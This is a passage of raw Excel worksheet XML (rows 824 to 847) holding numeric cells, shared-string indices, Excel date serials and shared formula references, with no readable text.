      <c r="I824" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J824" s="1" t="s">
        <v>3598</v>
      </c>
      <c r="K824" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="L824" s="1">
        <v>6.0</v>
      </c>
      <c r="M824" s="1">
        <v>6.0</v>
      </c>
      <c r="N824" s="1" t="s">
        <v>3603</v>
      </c>
      <c r="O824" s="1" t="s">
        <v>3600</v>
      </c>
      <c r="P824" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q824" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R824" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S824" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="1">
        <v>10138.0</v>
      </c>
      <c r="B825" s="2" t="s">
        <v>3604</v>
      </c>
      <c r="C825" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D825" s="2" t="s">
        <v>3595</v>
      </c>
      <c r="E825" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F825" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G825" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H825" s="1" t="s">
        <v>3605</v>
      </c>
      <c r="I825" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J825" s="1" t="s">
        <v>3598</v>
      </c>
      <c r="K825" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="L825" s="1">
        <v>6.0</v>
      </c>
      <c r="M825" s="1">
        <v>6.0</v>
      </c>
      <c r="N825" s="1" t="s">
        <v>3606</v>
      </c>
      <c r="O825" s="1" t="s">
        <v>3600</v>
      </c>
      <c r="P825" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q825" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R825" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S825" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="1">
        <v>10139.0</v>
      </c>
      <c r="B826" s="2" t="s">
        <v>3607</v>
      </c>
      <c r="C826" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D826" s="2" t="s">
        <v>3595</v>
      </c>
      <c r="E826" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F826" s="1" t="s">
        <v>3608</v>
      </c>
      <c r="G826" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H826" s="1" t="s">
        <v>3609</v>
      </c>
      <c r="I826" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J826" s="1" t="s">
        <v>3598</v>
      </c>
      <c r="K826" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="L826" s="1">
        <v>6.0</v>
      </c>
      <c r="M826" s="1">
        <v>6.0</v>
      </c>
      <c r="N826" s="1" t="s">
        <v>3610</v>
      </c>
      <c r="O826" s="1" t="s">
        <v>3600</v>
      </c>
      <c r="P826" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q826" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R826" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S826" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="1">
        <v>10140.0</v>
      </c>
      <c r="B827" s="2" t="s">
        <v>3611</v>
      </c>
      <c r="C827" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D827" s="2" t="s">
        <v>3612</v>
      </c>
      <c r="E827" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F827" s="1" t="s">
        <v>3613</v>
      </c>
      <c r="G827" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H827" s="1" t="s">
        <v>3614</v>
      </c>
      <c r="I827" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J827" s="1" t="s">
        <v>3615</v>
      </c>
      <c r="K827" s="2" t="s">
        <v>3616</v>
      </c>
      <c r="L827" s="1">
        <v>1.0</v>
      </c>
      <c r="M827" s="1">
        <v>1.0</v>
      </c>
      <c r="N827" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O827" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P827" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q827" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R827" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S827" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="1">
        <v>10141.0</v>
      </c>
      <c r="B828" s="2" t="s">
        <v>3617</v>
      </c>
      <c r="C828" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D828" s="2" t="s">
        <v>3618</v>
      </c>
      <c r="E828" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F828" s="1" t="s">
        <v>904</v>
      </c>
      <c r="G828" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H828" s="1" t="s">
        <v>3619</v>
      </c>
      <c r="I828" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J828" s="1" t="s">
        <v>3620</v>
      </c>
      <c r="K828" s="2" t="s">
        <v>3621</v>
      </c>
      <c r="L828" s="1">
        <v>1.0</v>
      </c>
      <c r="M828" s="1">
        <v>1.0</v>
      </c>
      <c r="N828" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O828" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P828" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q828" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R828" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S828" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="1">
        <v>10142.0</v>
      </c>
      <c r="B829" s="2" t="s">
        <v>3622</v>
      </c>
      <c r="C829" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D829" s="2" t="s">
        <v>3623</v>
      </c>
      <c r="E829" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F829" s="1" t="s">
        <v>3613</v>
      </c>
      <c r="G829" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H829" s="4">
        <v>44691.02638888889</v>
      </c>
      <c r="I829" s="1" t="s">
        <v>1869</v>
      </c>
      <c r="J829" s="1" t="s">
        <v>3624</v>
      </c>
      <c r="K829" s="2" t="s">
        <v>3625</v>
      </c>
      <c r="L829" s="1">
        <v>2.0</v>
      </c>
      <c r="M829" s="1">
        <v>2.0</v>
      </c>
      <c r="N829" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O829" s="1" t="s">
        <v>3626</v>
      </c>
      <c r="P829" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q829" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R829" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S829" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="1">
        <v>10144.0</v>
      </c>
      <c r="B830" s="2" t="s">
        <v>3627</v>
      </c>
      <c r="C830" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D830" s="2" t="s">
        <v>3628</v>
      </c>
      <c r="E830" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F830" s="1" t="s">
        <v>3629</v>
      </c>
      <c r="G830" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H830" s="4">
        <v>44627.5125</v>
      </c>
      <c r="I830" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J830" s="1" t="s">
        <v>3630</v>
      </c>
      <c r="K830" s="2" t="s">
        <v>3631</v>
      </c>
      <c r="L830" s="1">
        <v>2.0</v>
      </c>
      <c r="M830" s="1">
        <v>2.0</v>
      </c>
      <c r="N830" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O830" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="P830" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q830" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R830" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S830" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="1">
        <v>10146.0</v>
      </c>
      <c r="B831" s="2" t="s">
        <v>3633</v>
      </c>
      <c r="C831" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D831" s="2" t="s">
        <v>3634</v>
      </c>
      <c r="E831" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F831" s="1" t="s">
        <v>3635</v>
      </c>
      <c r="G831" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H831" s="1" t="s">
        <v>3636</v>
      </c>
      <c r="I831" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J831" s="1" t="s">
        <v>3637</v>
      </c>
      <c r="K831" s="2" t="s">
        <v>3638</v>
      </c>
      <c r="L831" s="1">
        <v>2.0</v>
      </c>
      <c r="M831" s="1">
        <v>2.0</v>
      </c>
      <c r="N831" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O831" s="1" t="s">
        <v>1108</v>
      </c>
      <c r="P831" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q831" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R831" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S831" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="1">
        <v>10150.0</v>
      </c>
      <c r="B832" s="2" t="s">
        <v>3639</v>
      </c>
      <c r="C832" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D832" s="2" t="s">
        <v>3640</v>
      </c>
      <c r="E832" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F832" s="1" t="s">
        <v>2878</v>
      </c>
      <c r="G832" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H832" s="1" t="s">
        <v>3641</v>
      </c>
      <c r="I832" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J832" s="1" t="s">
        <v>3642</v>
      </c>
      <c r="K832" s="2" t="s">
        <v>3643</v>
      </c>
      <c r="L832" s="1">
        <v>4.0</v>
      </c>
      <c r="M832" s="1">
        <v>4.0</v>
      </c>
      <c r="N832" s="1" t="s">
        <v>2423</v>
      </c>
      <c r="O832" s="1" t="s">
        <v>2310</v>
      </c>
      <c r="P832" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q832" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R832" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S832" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="1">
        <v>10152.0</v>
      </c>
      <c r="B833" s="2" t="s">
        <v>3644</v>
      </c>
      <c r="C833" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D833" s="2" t="s">
        <v>3645</v>
      </c>
      <c r="E833" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F833" s="1" t="s">
        <v>3646</v>
      </c>
      <c r="G833" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H833" s="4">
        <v>44596.85138888889</v>
      </c>
      <c r="I833" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J833" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="K833" s="2" t="s">
        <v>3648</v>
      </c>
      <c r="L833" s="1">
        <v>4.0</v>
      </c>
      <c r="M833" s="1">
        <v>4.0</v>
      </c>
      <c r="N833" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O833" s="1" t="s">
        <v>3649</v>
      </c>
      <c r="P833" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q833" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R833" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S833" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="1">
        <v>10153.0</v>
      </c>
      <c r="B834" s="2" t="s">
        <v>3650</v>
      </c>
      <c r="C834" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D834" s="2" t="s">
        <v>3645</v>
      </c>
      <c r="E834" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F834" s="1" t="s">
        <v>3651</v>
      </c>
      <c r="G834" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H834" s="4">
        <v>44624.01875</v>
      </c>
      <c r="I834" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J834" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="K834" s="2" t="s">
        <v>3648</v>
      </c>
      <c r="L834" s="1">
        <v>4.0</v>
      </c>
      <c r="M834" s="1">
        <v>4.0</v>
      </c>
      <c r="N834" s="1" t="s">
        <v>3652</v>
      </c>
      <c r="O834" s="1" t="s">
        <v>3649</v>
      </c>
      <c r="P834" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q834" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R834" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S834" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="1">
        <v>10154.0</v>
      </c>
      <c r="B835" s="2" t="s">
        <v>3653</v>
      </c>
      <c r="C835" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D835" s="2" t="s">
        <v>3645</v>
      </c>
      <c r="E835" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F835" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G835" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H835" s="4">
        <v>44624.305555555555</v>
      </c>
      <c r="I835" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J835" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="K835" s="2" t="s">
        <v>3648</v>
      </c>
      <c r="L835" s="1">
        <v>4.0</v>
      </c>
      <c r="M835" s="1">
        <v>4.0</v>
      </c>
      <c r="N835" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="O835" s="1" t="s">
        <v>3649</v>
      </c>
      <c r="P835" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q835" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R835" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S835" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="1">
        <v>10155.0</v>
      </c>
      <c r="B836" s="2" t="s">
        <v>3654</v>
      </c>
      <c r="C836" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D836" s="2" t="s">
        <v>3645</v>
      </c>
      <c r="E836" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F836" s="1" t="s">
        <v>3646</v>
      </c>
      <c r="G836" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H836" s="4">
        <v>44624.75</v>
      </c>
      <c r="I836" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J836" s="1" t="s">
        <v>3655</v>
      </c>
      <c r="K836" s="2" t="s">
        <v>3648</v>
      </c>
      <c r="L836" s="1">
        <v>1.0</v>
      </c>
      <c r="M836" s="1">
        <v>1.0</v>
      </c>
      <c r="N836" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O836" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P836" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q836" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R836" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S836" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="1">
        <v>10157.0</v>
      </c>
      <c r="B837" s="2" t="s">
        <v>3656</v>
      </c>
      <c r="C837" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D837" s="2" t="s">
        <v>3657</v>
      </c>
      <c r="E837" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F837" s="1" t="s">
        <v>3658</v>
      </c>
      <c r="G837" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H837" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="I837" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J837" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="K837" s="2" t="s">
        <v>3661</v>
      </c>
      <c r="L837" s="1">
        <v>4.0</v>
      </c>
      <c r="M837" s="1">
        <v>5.0</v>
      </c>
      <c r="N837" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O837" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="P837" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q837" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R837" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S837" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="1">
        <v>10158.0</v>
      </c>
      <c r="B838" s="2" t="s">
        <v>3663</v>
      </c>
      <c r="C838" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D838" s="2" t="s">
        <v>3657</v>
      </c>
      <c r="E838" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F838" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G838" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H838" s="1" t="s">
        <v>3664</v>
      </c>
      <c r="I838" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J838" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="K838" s="2" t="s">
        <v>3661</v>
      </c>
      <c r="L838" s="1">
        <v>4.0</v>
      </c>
      <c r="M838" s="1">
        <v>5.0</v>
      </c>
      <c r="N838" s="1" t="s">
        <v>3665</v>
      </c>
      <c r="O838" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="P838" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q838" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R838" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S838" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="1">
        <v>10161.0</v>
      </c>
      <c r="B839" s="2" t="s">
        <v>3666</v>
      </c>
      <c r="C839" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D839" s="2" t="s">
        <v>3657</v>
      </c>
      <c r="E839" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F839" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G839" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H839" s="1" t="s">
        <v>3667</v>
      </c>
      <c r="I839" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J839" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="K839" s="2" t="s">
        <v>3661</v>
      </c>
      <c r="L839" s="1">
        <v>4.0</v>
      </c>
      <c r="M839" s="1">
        <v>5.0</v>
      </c>
      <c r="N839" s="1" t="s">
        <v>3668</v>
      </c>
      <c r="O839" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="P839" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q839" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R839" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S839" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="1">
        <v>10162.0</v>
      </c>
      <c r="B840" s="2" t="s">
        <v>3669</v>
      </c>
      <c r="C840" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D840" s="2" t="s">
        <v>3670</v>
      </c>
      <c r="E840" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F840" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G840" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H840" s="1" t="s">
        <v>3671</v>
      </c>
      <c r="I840" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J840" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="K840" s="2" t="s">
        <v>3673</v>
      </c>
      <c r="L840" s="1">
        <v>4.0</v>
      </c>
      <c r="M840" s="1">
        <v>5.0</v>
      </c>
      <c r="N840" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O840" s="1" t="s">
        <v>3674</v>
      </c>
      <c r="P840" s="1" t="s">
        <v>3675</v>
      </c>
      <c r="Q840" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R840" s="2">
        <f t="shared" si="2"/>
        <v>14</v>
      </c>
      <c r="S840" s="1">
        <f t="shared" si="3"/>
        <v>14</v>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="1">
        <v>10164.0</v>
      </c>
      <c r="B841" s="2" t="s">
        <v>3676</v>
      </c>
      <c r="C841" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D841" s="2" t="s">
        <v>3670</v>
      </c>
      <c r="E841" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F841" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G841" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H841" s="1" t="s">
        <v>3677</v>
      </c>
      <c r="I841" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J841" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="K841" s="2" t="s">
        <v>3673</v>
      </c>
      <c r="L841" s="1">
        <v>4.0</v>
      </c>
      <c r="M841" s="1">
        <v>5.0</v>
      </c>
      <c r="N841" s="1" t="s">
        <v>3678</v>
      </c>
      <c r="O841" s="1" t="s">
        <v>3674</v>
      </c>
      <c r="P841" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q841" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R841" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S841" s="1">
        <f t="shared" si="3"/>
        <v>14</v>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="1">
        <v>10165.0</v>
      </c>
      <c r="B842" s="2" t="s">
        <v>3679</v>
      </c>
      <c r="C842" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D842" s="2" t="s">
        <v>3670</v>
      </c>
      <c r="E842" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F842" s="1" t="s">
        <v>720</v>
      </c>
      <c r="G842" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H842" s="4">
        <v>44293.904861111114</v>
      </c>
      <c r="I842" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J842" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="K842" s="2" t="s">
        <v>3673</v>
      </c>
      <c r="L842" s="1">
        <v>4.0</v>
      </c>
      <c r="M842" s="1">
        <v>5.0</v>
      </c>
      <c r="N842" s="1" t="s">
        <v>3680</v>
      </c>
      <c r="O842" s="1" t="s">
        <v>3674</v>
      </c>
      <c r="P842" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q842" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R842" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S842" s="1">
        <f t="shared" si="3"/>
        <v>14</v>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="1">
        <v>10166.0</v>
      </c>
      <c r="B843" s="2" t="s">
        <v>3681</v>
      </c>
      <c r="C843" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D843" s="2" t="s">
        <v>3670</v>
      </c>
      <c r="E843" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F843" s="1" t="s">
        <v>3682</v>
      </c>
      <c r="G843" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H843" s="4">
        <v>44323.92083333333</v>
      </c>
      <c r="I843" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J843" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="K843" s="2" t="s">
        <v>3673</v>
      </c>
      <c r="L843" s="1">
        <v>4.0</v>
      </c>
      <c r="M843" s="1">
        <v>5.0</v>
      </c>
      <c r="N843" s="1" t="s">
        <v>3683</v>
      </c>
      <c r="O843" s="1" t="s">
        <v>3674</v>
      </c>
      <c r="P843" s="1" t="s">
        <v>510</v>
      </c>
      <c r="Q843" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R843" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S843" s="1">
        <f t="shared" si="3"/>
        <v>14</v>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="1">
        <v>10167.0</v>
      </c>
      <c r="B844" s="2" t="s">
        <v>3684</v>
      </c>
      <c r="C844" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D844" s="2" t="s">
        <v>3685</v>
      </c>
      <c r="E844" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F844" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G844" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H844" s="1" t="s">
        <v>3686</v>
      </c>
      <c r="I844" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J844" s="1" t="s">
        <v>3687</v>
      </c>
      <c r="K844" s="2" t="s">
        <v>3688</v>
      </c>
      <c r="L844" s="1">
        <v>3.0</v>
      </c>
      <c r="M844" s="1">
        <v>3.0</v>
      </c>
      <c r="N844" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O844" s="1" t="s">
        <v>3689</v>
      </c>
      <c r="P844" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q844" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R844" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S844" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="1">
        <v>10168.0</v>
      </c>
      <c r="B845" s="2" t="s">
        <v>3690</v>
      </c>
      <c r="C845" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D845" s="2" t="s">
        <v>3685</v>
      </c>
      <c r="E845" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F845" s="1" t="s">
        <v>3691</v>
      </c>
      <c r="G845" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H845" s="1" t="s">
        <v>3692</v>
      </c>
      <c r="I845" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J845" s="1" t="s">
        <v>3687</v>
      </c>
      <c r="K845" s="2" t="s">
        <v>3688</v>
      </c>
      <c r="L845" s="1">
        <v>3.0</v>
      </c>
      <c r="M845" s="1">
        <v>3.0</v>
      </c>
      <c r="N845" s="1" t="s">
        <v>3693</v>
      </c>
      <c r="O845" s="1" t="s">
        <v>3689</v>
      </c>
      <c r="P845" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q845" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R845" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S845" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="1">
        <v>10170.0</v>
      </c>
      <c r="B846" s="2" t="s">
        <v>3694</v>
      </c>
      <c r="C846" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D846" s="2" t="s">
        <v>3695</v>
      </c>
      <c r="E846" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F846" s="1" t="s">
        <v>3696</v>
      </c>
      <c r="G846" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H846" s="1" t="s">
        <v>3697</v>
      </c>
      <c r="I846" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J846" s="1" t="s">
        <v>3698</v>
      </c>
      <c r="K846" s="2" t="s">
        <v>3699</v>
      </c>
      <c r="L846" s="1">
        <v>1.0</v>
      </c>
      <c r="M846" s="1">
        <v>1.0</v>
      </c>
      <c r="N846" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O846" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P846" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q846" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R846" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S846" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="1">
        <v>10171.0</v>
      </c>
      <c r="B847" s="2" t="s">
        <v>3694</v>
      </c>
      <c r="C847" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D847" s="2" t="s">
        <v>3695</v>
      </c>
      <c r="E847" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F847" s="1" t="s">
        <v>3696</v>
      </c>
      <c r="G847" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H847" s="1" t="s">
        <v>3700</v>
      </c>
      <c r="I847" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J847" s="1" t="s">
        <v>3701</v>
      </c>
      <c r="K847" s="2" t="s">
        <v>3702</v>
      </c>
      <c r="L847" s="1">
        <v>2.0</v>
      </c>
      <c r="M847" s="1">
        <v>2.0</v>
      </c>
      <c r="N847" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O847" s="1" t="s">
        <v>3703</v>
      </c>
      <c r="P847" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q847" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R847" s="2">
        <f t="shared" si="2"/>
